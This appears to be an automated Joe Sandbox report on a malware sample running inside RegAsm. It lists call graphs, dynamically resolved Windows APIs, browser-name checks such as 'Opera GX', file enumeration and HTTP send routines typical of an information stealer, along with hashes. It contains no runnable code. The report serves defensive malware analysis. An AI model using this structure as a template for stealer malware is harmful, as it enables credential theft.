72205->72206 72207 4022a0 10 API calls 72206->72207 72208 4042bc 72207->72208 72209 4022a0 10 API calls 72208->72209 72210 4042d2 72209->72210 72211 4022a0 10 API calls 72210->72211 72212 4042e8 72211->72212 72213 4022a0 10 API calls 72212->72213 72214 4042fe 72213->72214 72215 4022a0 10 API calls 72214->72215 72216 404314 72215->72216 72217 4022a0 10 API calls 72216->72217 72218 40432a 72217->72218 72219 4022a0 10 API calls 72218->72219 72220 404343 72219->72220 72221 4187b0 72220->72221 72222 4187bd 43 API calls 72221->72222 72223 418bce 9 API calls 72221->72223 72222->72223 72224 418c74 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 72223->72224 72225 418ce8 72223->72225 72224->72225 72226 418db2 72225->72226 72227 418cf5 8 API calls 72225->72227 72228 418dbb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 72226->72228 72229 418e2f 72226->72229 72227->72226 72228->72229 72230 418ec9 72229->72230 72231 418e3c 6 API calls 72229->72231 72232 418ed6 9 API calls 72230->72232 72233 418fac 72230->72233 72231->72230 72232->72233 72234 418fb5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 72233->72234 72235 419029 72233->72235 72234->72235 72236 419032 GetProcAddress GetProcAddress 72235->72236 72237 41905d 72235->72237 72236->72237 72238 419091 72237->72238 72239 419066 GetProcAddress GetProcAddress 72237->72239 72240 419189 72238->72240 72241 41909e 10 API calls 72238->72241 72239->72238 72242 419192 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 72240->72242 72243 4191ee 72240->72243 72241->72240 72242->72243 72244 4191f7 GetProcAddress 72243->72244 72245 41920a 72243->72245 72244->72245 72246 419213 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 72245->72246 72247 41926f 72245->72247 72246->72247 72248 417c4d 72247->72248 72249 419278 GetProcAddress 72247->72249 72250 401060 72248->72250 72249->72248 72251 40fd40 lstrcpy 72250->72251 72252 401089 72251->72252 
72253 40fd40 lstrcpy 72252->72253 72254 40109c 72253->72254 72255 40fd40 lstrcpy 72254->72255 72256 4010b8 72255->72256 72257 414200 72256->72257 72258 414238 72257->72258 72259 40fd90 2 API calls 72258->72259 72260 414261 72259->72260 72261 40fd90 2 API calls 72260->72261 72262 41426e 72261->72262 72263 40fd90 2 API calls 72262->72263 72264 41427b 72263->72264 72265 40fd00 lstrcpy 72264->72265 72266 414288 72265->72266 72267 40fd00 lstrcpy 72266->72267 72268 414299 72267->72268 72269 40fd00 lstrcpy 72268->72269 72270 4142aa 72269->72270 72271 40fd00 lstrcpy 72270->72271 72272 4142be 72271->72272 72273 40fd00 lstrcpy 72272->72273 72274 4142cf 72273->72274 72275 40fd00 lstrcpy 72274->72275 72382 4142e3 72275->72382 72276 4023a0 lstrcpy 72276->72382 72278 402400 lstrcpy 72278->72382 72279 40fd40 lstrcpy 72279->72382 72280 414507 StrCmpCA 72280->72382 72281 41459c StrCmpCA 72282 415176 72281->72282 72281->72382 72283 40fde0 lstrcpy 72282->72283 72284 415182 72283->72284 73371 402400 72284->73371 72287 40fde0 lstrcpy 72289 41519b 72287->72289 72288 41476f StrCmpCA 72290 415067 72288->72290 72288->72382 73374 402690 lstrcpy 72289->73374 72291 40fde0 lstrcpy 72290->72291 72293 415073 72291->72293 72292 402430 lstrcpy 72292->72382 73369 402490 lstrcpy 72293->73369 72297 4151af 72300 40fde0 lstrcpy 72297->72300 72298 41507c 72301 40fde0 lstrcpy 72298->72301 72299 41495b StrCmpCA 72302 414f55 72299->72302 72299->72382 72303 4151bf 72300->72303 72304 41508c 72301->72304 72305 40fde0 lstrcpy 72302->72305 72309 40fd40 lstrcpy 72303->72309 73370 4026c0 lstrcpy 72304->73370 72307 414f64 72305->72307 72306 402490 lstrcpy 72306->72382 73367 402520 lstrcpy 72307->73367 72313 4151d8 72309->72313 72312 414f6d 72316 40fde0 lstrcpy 72312->72316 72319 40fd40 lstrcpy 72313->72319 72314 4150a0 72315 40fde0 lstrcpy 72314->72315 72321 4150b0 72315->72321 72322 414f7d 72316->72322 72317 401060 lstrcpy 72317->72382 72318 414b2e StrCmpCA 72323 414e40 72318->72323 72318->72382 72320 4151e8 
72319->72320 72324 40fd40 lstrcpy 72320->72324 72331 40fd40 lstrcpy 72321->72331 73368 4026f0 lstrcpy 72322->73368 72325 40fde0 lstrcpy 72323->72325 72387 414db3 72324->72387 72328 414e4c 72325->72328 72326 402520 lstrcpy 72326->72382 72327 402550 lstrcpy 72327->72382 73365 4025b0 lstrcpy 72328->73365 72329 4146da StrCmpCA 72329->72382 72334 4150c9 72331->72334 72337 40fd40 lstrcpy 72334->72337 72335 414f91 72338 40fde0 lstrcpy 72335->72338 72336 414e55 72340 40fde0 lstrcpy 72336->72340 72342 4150d9 72337->72342 72343 414fa1 72338->72343 72339 414d0d StrCmpCA 72344 414d28 72339->72344 72345 414d18 Sleep 72339->72345 72346 414e65 72340->72346 72341 4024c0 lstrcpy 72341->72382 72350 40fd40 lstrcpy 72342->72350 72354 40fd40 lstrcpy 72343->72354 72348 40fde0 lstrcpy 72344->72348 72345->72382 73366 402720 lstrcpy 72346->73366 72347 4025b0 lstrcpy 72347->72382 72352 414d37 72348->72352 72349 4025e0 lstrcpy 72349->72382 72350->72387 72351 4148b9 StrCmpCA 72351->72382 73363 402640 lstrcpy 72352->73363 72357 414fba 72354->72357 72360 40fd40 lstrcpy 72357->72360 72358 414d40 72361 40fde0 lstrcpy 72358->72361 72359 414e7c 72362 40fde0 lstrcpy 72359->72362 72363 414fca 72360->72363 72364 414d50 72361->72364 72365 414e8c 72362->72365 72367 40fd40 lstrcpy 72363->72367 73364 402750 lstrcpy 72364->73364 72369 40fd40 lstrcpy 72365->72369 72366 413a50 29 API calls 72366->72382 72367->72387 72368 414a99 StrCmpCA 72368->72382 72371 414ea8 72369->72371 72373 40fd40 lstrcpy 72371->72373 72372 414d67 72374 40fde0 lstrcpy 72372->72374 72375 414eb8 72373->72375 72376 414d77 72374->72376 72377 40fd40 lstrcpy 72375->72377 72379 40fd40 lstrcpy 72376->72379 72377->72387 72378 414c78 StrCmpCA 72378->72382 72381 414d93 72379->72381 72380 402640 lstrcpy 72380->72382 72383 40fd40 lstrcpy 72381->72383 72382->72276 72382->72278 72382->72279 72382->72280 72382->72281 72382->72288 72382->72292 72382->72299 72382->72306 72382->72317 72382->72318 72382->72326 72382->72327 72382->72329 72382->72339 
72382->72341 72382->72347 72382->72349 72382->72351 72382->72366 72382->72368 72382->72378 72382->72380 72386 40fde0 lstrcpy 72382->72386 72388 413910 24 API calls 72382->72388 73356 4023d0 72382->73356 73359 402460 lstrcpy 72382->73359 73360 4024f0 lstrcpy 72382->73360 73361 402580 lstrcpy 72382->73361 73362 402610 lstrcpy 72382->73362 72384 414da3 72383->72384 72385 40fd40 lstrcpy 72384->72385 72385->72387 72386->72382 72387->71513 72388->72382 72390 40fd57 72389->72390 72391 40fd6e 72390->72391 72392 40fd66 lstrcpy 72390->72392 72391->71526 72392->72391 72394 40fe7b 72393->72394 72395 40fea5 72394->72395 72396 40fe91 lstrcpy lstrcat 72394->72396 72395->71532 72396->72395 72397->71536 72399 40fd00 lstrcpy 72398->72399 72400 40238b 72399->72400 72401 410c10 GetWindowsDirectoryA 72400->72401 72402 410c52 72401->72402 72403 410c59 GetVolumeInformationA 72401->72403 72402->72403 72404 410c90 72403->72404 72405 410cc6 GetProcessHeap HeapAlloc 72404->72405 72406 410ce0 72405->72406 72407 410cfc wsprintfA lstrcat 72405->72407 72408 40fd00 lstrcpy 72406->72408 73375 410bb0 GetCurrentHwProfileA 72407->73375 72410 410ceb 72408->72410 72410->71542 72411 410d2f 72412 410d41 lstrlenA 72411->72412 72413 410d56 72412->72413 73382 411a30 lstrcpy malloc strncpy 72413->73382 72415 410d60 72416 410d6e lstrcat 72415->72416 72417 410d82 72416->72417 72418 40fd00 lstrcpy 72417->72418 72419 410d95 72418->72419 72419->71542 72421 40fd40 lstrcpy 72420->72421 72422 404460 72421->72422 73383 404350 72422->73383 72424 40446c 72425 40fd00 lstrcpy 72424->72425 72426 40448d 72425->72426 72427 40fd00 lstrcpy 72426->72427 72428 4044a1 72427->72428 72429 40fd00 lstrcpy 72428->72429 72430 4044b2 72429->72430 72431 40fd00 lstrcpy 72430->72431 72432 4044c3 72431->72432 72433 40fd00 lstrcpy 72432->72433 72434 4044d4 72433->72434 72435 4044e9 InternetOpenA StrCmpCA 72434->72435 72436 404514 72435->72436 72437 404a88 InternetCloseHandle 72436->72437 73391 411330 72436->73391 72451 404a9a 72437->72451 
72439 40452e 72440 40fe30 2 API calls 72439->72440 72441 404542 72440->72441 72442 40fde0 lstrcpy 72441->72442 72443 40454f 72442->72443 72444 40fec0 3 API calls 72443->72444 72445 404577 72444->72445 72446 40fde0 lstrcpy 72445->72446 72447 404584 72446->72447 72448 40fec0 3 API calls 72447->72448 72449 4045a0 72448->72449 72450 40fde0 lstrcpy 72449->72450 72452 4045ad 72450->72452 72451->71546 72453 40fe30 2 API calls 72452->72453 72454 4045c8 72453->72454 72455 40fde0 lstrcpy 72454->72455 72456 4045d5 72455->72456 72457 40fec0 3 API calls 72456->72457 72458 4045f1 72457->72458 72459 40fde0 lstrcpy 72458->72459 72460 4045fe 72459->72460 72461 40fec0 3 API calls 72460->72461 72462 40461a 72461->72462 72463 40fde0 lstrcpy 72462->72463 72464 404627 72463->72464 72465 40fec0 3 API calls 72464->72465 72466 404644 72465->72466 72467 40fe30 2 API calls 72466->72467 72468 404657 72467->72468 72469 40fde0 lstrcpy 72468->72469 72470 404664 72469->72470 72471 40467b InternetConnectA 72470->72471 72471->72437 72472 4046a7 HttpOpenRequestA 72471->72472 72473 4046e5 72472->72473 72474 404a7b InternetCloseHandle 72472->72474 72475 404701 72473->72475 72476 4046eb InternetSetOptionA 72473->72476 72474->72437 72477 40fec0 3 API calls 72475->72477 72476->72475 72478 404712 72477->72478 72479 40fde0 lstrcpy 72478->72479 72480 40471f 72479->72480 72481 40fe30 2 API calls 72480->72481 72482 40473a 72481->72482 72483 40fde0 lstrcpy 72482->72483 72484 404747 72483->72484 72485 40fec0 3 API calls 72484->72485 72486 404763 72485->72486 72487 40fde0 lstrcpy 72486->72487 72488 404770 72487->72488 72489 40fec0 3 API calls 72488->72489 72490 40478e 72489->72490 72491 40fde0 lstrcpy 72490->72491 72492 40479b 72491->72492 72493 40fec0 3 API calls 72492->72493 72494 4047b7 72493->72494 72495 40fde0 lstrcpy 72494->72495 72496 4047c4 72495->72496 72497 40fec0 3 API calls 72496->72497 72498 4047e0 72497->72498 72499 40fde0 lstrcpy 72498->72499 72500 4047ed 72499->72500 72501 40fe30 2 API calls 
72500->72501 72502 404808 72501->72502 72503 40fde0 lstrcpy 72502->72503 72504 404815 72503->72504 72505 40fec0 3 API calls 72504->72505 72506 404831 72505->72506 72507 40fde0 lstrcpy 72506->72507 72508 40483e 72507->72508 72509 40fec0 3 API calls 72508->72509 72510 40485a 72509->72510 72511 40fde0 lstrcpy 72510->72511 72512 404867 72511->72512 72513 40fe30 2 API calls 72512->72513 72514 404882 72513->72514 72515 40fde0 lstrcpy 72514->72515 72516 40488f 72515->72516 72517 40fec0 3 API calls 72516->72517 72518 4048ab 72517->72518 72519 40fde0 lstrcpy 72518->72519 72520 4048b8 72519->72520 72521 40fec0 3 API calls 72520->72521 72522 4048d6 72521->72522 72523 40fde0 lstrcpy 72522->72523 72524 4048e3 72523->72524 72525 40fec0 3 API calls 72524->72525 72526 4048ff 72525->72526 72527 40fde0 lstrcpy 72526->72527 72528 40490c 72527->72528 72529 40fec0 3 API calls 72528->72529 72530 404928 72529->72530 72531 40fde0 lstrcpy 72530->72531 72532 404935 72531->72532 72533 40fe30 2 API calls 72532->72533 72534 404950 72533->72534 72535 40fde0 lstrcpy 72534->72535 72536 40495d 72535->72536 72537 40fd00 lstrcpy 72536->72537 72538 404975 72537->72538 72539 40fe30 2 API calls 72538->72539 72540 404989 72539->72540 72541 40fe30 2 API calls 72540->72541 72542 40499c 72541->72542 72543 40fde0 lstrcpy 72542->72543 72544 4049a9 72543->72544 72545 4049c9 lstrlenA 72544->72545 72546 4049d9 72545->72546 72547 4049e2 lstrlenA 72546->72547 73397 40ffa0 72547->73397 72549 4049f2 HttpSendRequestA InternetReadFile 72550 404a15 72549->72550 72551 404a69 InternetCloseHandle 72549->72551 72550->72551 72555 404a1c 72550->72555 73398 40fd80 72551->73398 72553 40fec0 3 API calls 72553->72555 72554 40fde0 lstrcpy 72554->72555 72555->72553 72555->72554 72556 404a4e InternetReadFile 72555->72556 72556->72550 72556->72551 73402 40ffa0 72557->73402 72559 4126a7 StrCmpCA 72560 4126b2 ExitProcess 72559->72560 72561 4126b9 72559->72561 72562 4126c9 strtok_s 72561->72562 72563 41281b 72562->72563 72569 4126da 
72562->72569 72563->71548 72564 4127ff strtok_s 72564->72563 72564->72569 72565 4127b1 StrCmpCA 72565->72564 72566 412710 StrCmpCA 72566->72564 72566->72569 72567 412772 StrCmpCA 72567->72564 72567->72569 72568 4126f4 StrCmpCA 72568->72564 72568->72569 72569->72564 72569->72565 72569->72566 72569->72567 72569->72568 72570 412787 StrCmpCA 72569->72570 72571 4127c7 StrCmpCA 72569->72571 72572 412748 StrCmpCA 72569->72572 72573 4127eb StrCmpCA 72569->72573 72574 41272c StrCmpCA 72569->72574 72575 41279c StrCmpCA 72569->72575 72576 40fd90 2 API calls 72569->72576 72570->72564 72570->72569 72571->72564 72572->72564 72572->72569 72573->72564 72574->72564 72574->72569 72575->72564 72575->72569 72576->72569 72578 40fd40 lstrcpy 72577->72578 72579 405c00 72578->72579 72580 404350 5 API calls 72579->72580 72581 405c0c 72580->72581 72582 40fd00 lstrcpy 72581->72582 72583 405c2d 72582->72583 72584 40fd00 lstrcpy 72583->72584 72585 405c41 72584->72585 72586 40fd00 lstrcpy 72585->72586 72587 405c52 72586->72587 72588 40fd00 lstrcpy 72587->72588 72589 405c63 72588->72589 72590 40fd00 lstrcpy 72589->72590 72591 405c74 72590->72591 72592 405c89 InternetOpenA StrCmpCA 72591->72592 72593 405cb4 72592->72593 72594 40639f InternetCloseHandle 72593->72594 72595 411330 2 API calls 72593->72595 72596 4063b5 72594->72596 72597 405cce 72595->72597 73409 406e30 CryptStringToBinaryA 72596->73409 72598 40fe30 2 API calls 72597->72598 72600 405ce2 72598->72600 72602 40fde0 lstrcpy 72600->72602 72601 4063bb 72603 40fd90 2 API calls 72601->72603 72618 4063e9 72601->72618 72606 405cef 72602->72606 72604 4063ce 72603->72604 72605 40fec0 3 API calls 72604->72605 72607 4063dd 72605->72607 72609 40fec0 3 API calls 72606->72609 72608 40fde0 lstrcpy 72607->72608 72608->72618 72610 405d17 72609->72610 72611 40fde0 lstrcpy 72610->72611 72612 405d24 72611->72612 72613 40fec0 3 API calls 72612->72613 72614 405d40 72613->72614 72615 40fde0 lstrcpy 72614->72615 72616 405d4d 72615->72616 72617 40fe30 2 API 
calls 72616->72617 72619 405d68 72617->72619 72618->71554 72620 40fde0 lstrcpy 72619->72620 72621 405d75 72620->72621 72622 40fec0 3 API calls 72621->72622 72623 405d91 72622->72623 72624 40fde0 lstrcpy 72623->72624 72625 405d9e 72624->72625 72626 40fec0 3 API calls 72625->72626 72627 405dba 72626->72627 72628 40fde0 lstrcpy 72627->72628 72629 405dc7 72628->72629 72630 40fec0 3 API calls 72629->72630 72631 405de4 72630->72631 72632 40fe30 2 API calls 72631->72632 72633 405df7 72632->72633 72634 40fde0 lstrcpy 72633->72634 72635 405e04 72634->72635 72636 405e1b InternetConnectA 72635->72636 72637 405e47 HttpOpenRequestA 72636->72637 72638 40639c 72636->72638 72639 406395 InternetCloseHandle 72637->72639 72640 405e85 72637->72640 72638->72594 72639->72638 72641 405ea1 72640->72641 72642 405e8b InternetSetOptionA 72640->72642 72643 40fec0 3 API calls 72641->72643 72642->72641 72644 405eb2 72643->72644 72645 40fde0 lstrcpy 72644->72645 72646 405ebf 72645->72646 72647 40fe30 2 API calls 72646->72647 72648 405eda 72647->72648 72649 40fde0 lstrcpy 72648->72649 72650 405ee7 72649->72650 72651 40fec0 3 API calls 72650->72651 72652 405f03 72651->72652 72653 40fde0 lstrcpy 72652->72653 72654 405f10 72653->72654 72655 40fec0 3 API calls 72654->72655 72656 405f2d 72655->72656 72657 40fde0 lstrcpy 72656->72657 72658 405f3a 72657->72658 72659 40fec0 3 API calls 72658->72659 72660 405f58 72659->72660 72661 40fde0 lstrcpy 72660->72661 72662 405f65 72661->72662 72663 40fec0 3 API calls 72662->72663 72664 405f81 72663->72664 72665 40fde0 lstrcpy 72664->72665 72666 405f8e 72665->72666 72667 40fe30 2 API calls 72666->72667 72668 405fa9 72667->72668 72669 40fde0 lstrcpy 72668->72669 72670 405fb6 72669->72670 72671 40fec0 3 API calls 72670->72671 72672 405fd2 72671->72672 72673 40fde0 lstrcpy 72672->72673 72674 405fdf 72673->72674 72675 40fec0 3 API calls 72674->72675 72676 405ffb 72675->72676 72677 40fde0 lstrcpy 72676->72677 72678 406008 72677->72678 72679 40fe30 2 API calls 
72678->72679 72680 406023 72679->72680 72681 40fde0 lstrcpy 72680->72681 72682 406030 72681->72682 72683 40fec0 3 API calls 72682->72683 72684 40604c 72683->72684 72685 40fde0 lstrcpy 72684->72685 72686 406059 72685->72686 72687 40fec0 3 API calls 72686->72687 72688 406076 72687->72688 72689 40fde0 lstrcpy 72688->72689 72690 406083 72689->72690 72691 40fec0 3 API calls 72690->72691 72692 40609f 72691->72692 72693 40fde0 lstrcpy 72692->72693 72694 4060ac 72693->72694 72695 40fec0 3 API calls 72694->72695 72696 4060c8 72695->72696 72697 40fde0 lstrcpy 72696->72697 72698 4060d5 72697->72698 72699 402370 lstrcpy 72698->72699 72700 4060e9 72699->72700 72701 40fe30 2 API calls 72700->72701 72702 4060fd 72701->72702 72703 40fde0 lstrcpy 72702->72703 72704 40610a 72703->72704 72705 40fec0 3 API calls 72704->72705 72706 406132 72705->72706 72707 40fde0 lstrcpy 72706->72707 72708 40613f 72707->72708 72709 40fec0 3 API calls 72708->72709 72710 40615b 72709->72710 72711 40fde0 lstrcpy 72710->72711 72712 406168 72711->72712 72713 40fe30 2 API calls 72712->72713 72714 406183 72713->72714 72715 40fde0 lstrcpy 72714->72715 72716 406190 72715->72716 72717 40fec0 3 API calls 72716->72717 72718 4061ac 72717->72718 72719 40fde0 lstrcpy 72718->72719 72720 4061b9 72719->72720 72721 40fec0 3 API calls 72720->72721 72722 4061d7 72721->72722 72723 40fde0 lstrcpy 72722->72723 72724 4061e4 72723->72724 72725 40fec0 3 API calls 72724->72725 72726 406200 72725->72726 72727 40fde0 lstrcpy 72726->72727 72728 40620d 72727->72728 72729 40fec0 3 API calls 72728->72729 72730 406229 72729->72730 72731 40fde0 lstrcpy 72730->72731 72732 406236 72731->72732 72733 40fe30 2 API calls 72732->72733 72734 406251 72733->72734 72735 40fde0 lstrcpy 72734->72735 72736 40625e 72735->72736 72737 406271 lstrlenA 72736->72737 73403 40ffa0 72737->73403 72739 406282 lstrlenA GetProcessHeap HeapAlloc 73404 40ffa0 72739->73404 72741 4062a5 lstrlenA 73405 40ffa0 72741->73405 72743 4062b5 memcpy 73406 40ffa0 72743->73406 

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 551 418460-418472 LoadLibraryA 552 418687-4186e6 LoadLibraryA * 5 551->552 553 418478-418682 GetProcAddress * 21 551->553 554 4186e8-4186f6 GetProcAddress 552->554 555 4186fb-418702 552->555 553->552 554->555 557 418704-41872a GetProcAddress * 2 555->557 558 41872f-418736 555->558 557->558 559 418738-418746 GetProcAddress 558->559 560 41874b-418752 558->560 559->560 561 418754-418762 GetProcAddress 560->561 562 418767-41876e 560->562 561->562 563 418770-418795 GetProcAddress * 2 562->563 564 41879a 562->564 563->564
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00418370), ref: 00418465
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00CAF390), ref: 00418480
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF1B0), ref: 004184AD
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF210), ref: 004184C6
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF2E8), ref: 004184DE
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF4E0), ref: 004184F6
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2F10), ref: 0041850F
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2A40), ref: 00418527
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2C60), ref: 0041853F
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF498), ref: 00418558
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF4F8), ref: 00418570
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF4C8), ref: 00418588
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF510), ref: 004185A1
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2A60), ref: 004185B9
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF528), ref: 004185D1
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF4B0), ref: 004185EA
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2AC0), ref: 00418602
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF540), ref: 0041861A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF480), ref: 00418633
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2AA0), ref: 0041864B
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CACB18), ref: 00418663
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2C80), ref: 0041867C
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CBD930), ref: 0041868D
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CBD9F0), ref: 0041869F
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CBDA50), ref: 004186B1
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CBD960), ref: 004186C2
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CBD900), ref: 004186D4
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75A70000,00CBD8A0), ref: 004186F0
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00CBDAB0), ref: 0041870C
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00CBD918), ref: 00418724
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00CBDB70), ref: 00418740
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75450000,00CB2CC0), ref: 0041875C
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(76E90000,00CB2DC0), ref: 00418778
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 0041878F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                            • String ID: NtQueryInformationProcess$kernel32.dll
                                                                                                                                                                                                            • API String ID: 2238633743-258108907
                                                                                                                                                                                                            • Opcode ID: 674a5d5d7bdfe3b15cf9f5f0ddbdd50571bedb9e90fbad599d80228331ceaa6d
                                                                                                                                                                                                            • Instruction ID: 4c9a75b0f2effc14e4ef035a4ebbe2e79da5c4c43e5452636d71d6eae6be30f3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 674a5d5d7bdfe3b15cf9f5f0ddbdd50571bedb9e90fbad599d80228331ceaa6d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B39143BDA00620EFE754DFA4ED58E2637BBF74AB01B106529EA05C7370E774A841CB64
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

[Control-flow graph of the function starting at 00416370; graph not preserved. Legend: Executed, Not Executed]
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$strtok_swsprintf$lstrcat$FileFindFirstMatchPathSpec
                                                                                                                                                                                                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                            • API String ID: 1425701045-3225784412
                                                                                                                                                                                                            • Opcode ID: 75e946977d0fc4a16568379e8c510530124d5f1fd8a79c07567be36d99771b71
                                                                                                                                                                                                            • Instruction ID: 12f42e42b75de4f13967d3fa557f7841a92df3f38c0c947d1ab3e90f6382c67b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75e946977d0fc4a16568379e8c510530124d5f1fd8a79c07567be36d99771b71
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56C1DEB1900218ABDB10EFA4DD85EEE77B8EF48704F50859EF50593281D7789E88CBA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

[Control-flow graph of the function starting at 0040D200; graph not preserved. Legend: Executed, Not Executed]
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,004268D2,004268CF,00000000,?,00426A10,?,?,004268CE,?,00000000,00000005), ref: 0040D2B4
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426A14), ref: 0040D31C
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426A18), ref: 0040D336
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00426A1C,?,?,004268D3), ref: 0040D3E4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
